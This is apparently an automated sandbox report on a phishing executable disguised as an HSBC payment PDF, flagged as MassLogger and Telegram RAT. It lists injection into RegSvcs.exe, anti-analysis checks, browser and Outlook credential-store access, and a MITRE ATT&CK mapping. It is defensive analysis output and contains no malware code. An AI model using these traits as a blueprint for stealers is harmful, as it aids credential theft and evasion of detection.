Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to behavior

Source: SensorDataService.exe, 00000011.00000003.1429653704.00000000004FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware Virtual disk SCSI Disk DevicergPeP
Source: SensorDataService.exe, 00000011.00000003.1429653704.00000000004FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: nfNECVMWar VMware SATA CD00NDIS Virtual Net\PP
Source: Spectrum.exe, 00000014.00000003.1447911747.000000000050B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware Virtual disk SCSI Disk Deviceb
Source: Spectrum.exe, 00000014.00000002.2571296510.0000000000502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: O2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
Source: Spectrum.exe, 00000014.00000002.2571296510.0000000000502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .inVMware Virtual disk SCSI Disk Devicet System Management
Source: Spectrum.exe, 00000014.00000003.1449613732.00000000004F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: Spectrum.exe, 00000014.00000003.1447911747.000000000050B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: SensorDataService.exe, 00000011.00000003.1429368465.00000000004FB000.00000004.00000020.00020000.00000000.sdmp, SensorDataService.exe, 00000011.00000003.1429499974.00000000004FB000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000014.00000003.1449613732.00000000004F3000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000014.00000002.2571296510.0000000000502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000003.1369962913.0000000000C2A000.00000004.00000020.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000002.1385419248.0000000000AEA000.00000004.00000020.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000002.1385930631.0000000000C2A000.00000004.00000020.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000003.1362494796.0000000000C2A000.00000004.00000020.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000003.1362853232.0000000000C2A000.00000004.00000020.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000003.1362494796.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000003.1362853232.0000000000C33000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: SensorDataService.exe, 00000011.00000003.1429368465.00000000004EC000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000014.00000003.1447652612.00000000004F5000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000014.00000003.1449613732.00000000004F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @wgencounter.inf,%gencounter.devicedesc%;Microsoft Hyper-V Generation Counter
Source: Spectrum.exe, 00000014.00000003.1447911747.000000000050B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00L
Source: RegSvcs.exe, 0000000C.00000002.2577573306.0000000000578000.00000004.00000020.00020000.00000000.sdmp, ssh-agent.exe, 00000016.00000002.2577070247.00000000004AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Spectrum.exe, 00000014.00000003.1449613732.00000000004F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: SensorDataService.exe, 00000011.00000003.1429368465.00000000004EC000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000014.00000003.1447652612.00000000004F5000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000014.00000003.1449613732.00000000004F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @wvid.inf,%vid.devicedesc%;Microsoft Hyper-V Virtualization Infrastructure Driver`
Source: SensorDataService.exe, 00000011.00000003.1429653704.00000000004FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ePSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: SensorDataService.exe, 00000011.00000003.1429653704.00000000004FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NPSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: Spectrum.exe, 00000014.00000003.1447755891.00000000004F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Drivertel_-_Intel64_Fami4DO
Source: Spectrum.exe, 00000014.00000003.1449613732.00000000004F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: v@oem2.inf,%loc.vmwarebusdevicedesc%;VMware VMCI Bus Device
Source: Spectrum.exe, 00000014.00000003.1449613732.00000000004F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 4NECVMWar VMware SATA CD00
Source: Spectrum.exe, 00000014.00000002.2571296510.0000000000502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: QSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: Spectrum.exe, 00000014.00000002.2571296510.0000000000502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00
Source: AppVClient.exe, 00000008.00000003.1345206928.0000000000480000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000008.00000002.1345981155.000000000049E000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000008.00000003.1345297584.0000000000487000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: appv:SoftwareClients/appv:JavaVirtualMachine]
Source: Spectrum.exe, 00000014.00000003.1447911747.000000000050B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device
Source: Spectrum.exe, 00000014.00000003.1449613732.00000000004F3000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000014.00000002.2571296510.0000000000502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter<XP
Source: Spectrum.exe, 00000014.00000002.2571296510.0000000000502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [QSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000on
Source: SensorDataService.exe, 00000011.00000003.1429499974.00000000004E9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter
Source: Spectrum.exe, 00000014.00000002.2571296510.0000000000502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: infVMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device Audio DeviceVhd
Source: Spectrum.exe, 00000014.00000003.1449613732.00000000004F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JVMware Virtual disk SCSI Disk Device
Source: snmptrap.exe, 00000013.00000002.2571465643.00000000004E6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllvv

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 1_2_00473F09 BlockInput,

1_2_00473F09

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 1_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

1_2_00403B3A

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 1_2_00435A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

1_2_00435A7C

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 1_2_00404B37 LoadLibraryA,GetProcAddress,

1_2_00404B37

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_0053AFF8 mov eax, dword ptr fs:[00000030h]	1_2_0053AFF8
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00991130 mov eax, dword ptr fs:[00000030h]	1_2_00991130
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_009D34CD mov eax, dword ptr fs:[00000030h]	1_2_009D34CD
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00C424A8 mov eax, dword ptr fs:[00000030h]	1_2_00C424A8
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00C42448 mov eax, dword ptr fs:[00000030h]	1_2_00C42448
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00C40DE8 mov eax, dword ptr fs:[00000030h]	1_2_00C40DE8

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 1_2_004580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

1_2_004580A9

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Process token adjusted: Debug

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_0042A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_0042A155
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_0042A124 SetUnhandledExceptionFilter,	1_2_0042A124
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_009D420B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_009D420B
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_009D08F1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_009D08F1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 1.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.4190000.2.raw.unpack, UltraSpeed.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 1.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.4190000.2.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 1.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.4190000.2.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtOpenKeyEx: Indirect: 0x140077B9B	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtQueryValueKey: Indirect: 0x140077C9F	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtClose: Indirect: 0x140077E81

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 2BA008

Jump to behavior

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 1_2_004587B1 LogonUserW,

1_2_004587B1

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 1_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

1_2_00403B3A

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 1_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

1_2_004048D7

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 1_2_00464C53 mouse_event,

1_2_00464C53

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe"

Jump to behavior

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 1_2_00457CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

1_2_00457CAF

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 1_2_0045874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

1_2_0045874B

Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 1_2_0042862B cpuid

1_2_0042862B

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TST3E6.tmp VolumeInformation	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TST3F7.tmp VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\perfhost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\Spectrum.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\System32\TieringEngineService.exe

Key value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 1_2_00434E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

1_2_00434E87

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 1_2_00441E06 GetUserNameW,

1_2_00441E06

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 1_2_00433F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

1_2_00433F3A

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 1_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

1_2_004049A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected MassLogger RAT

Source: Yara match	File source: 1.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.4190000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.4190000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.2611502749.00000000024EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1388728173.0000000004190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2611502749.00000000023EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2565814080.0000000000142000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe PID: 7288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7744, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 1.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.4190000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.4190000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.2611502749.00000000024EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1388728173.0000000004190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2611502749.00000000023EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2565814080.0000000000142000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe PID: 7288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7744, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Binary or memory string: WIN_81
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Binary or memory string: WIN_XP
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Binary or memory string: WIN_XPe
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Binary or memory string: WIN_VISTA
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Binary or memory string: WIN_7
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Binary or memory string: WIN_8
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: Yara match	File source: 1.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.4190000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.4190000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.2611502749.00000000024EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1388728173.0000000004190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2611502749.00000000023EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2565814080.0000000000142000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe PID: 7288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7744, type: MEMORYSTR

Remote Access Functionality

Yara detected MassLogger RAT

Source: Yara match	File source: 1.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.4190000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.4190000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.2611502749.00000000024EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1388728173.0000000004190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2611502749.00000000023EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2565814080.0000000000142000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe PID: 7288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7744, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 1.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.4190000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.4190000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.2611502749.00000000024EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1388728173.0000000004190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2611502749.00000000023EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2565814080.0000000000142000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe PID: 7288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7744, type: MEMORYSTR

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00476283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		1_2_00476283
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00476747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		1_2_00476747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	12 Native API	2 LSASS Driver	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	12 System Time Discovery	1 Taint Shared Content	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	11 Deobfuscate/Decode Files or Information	121 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
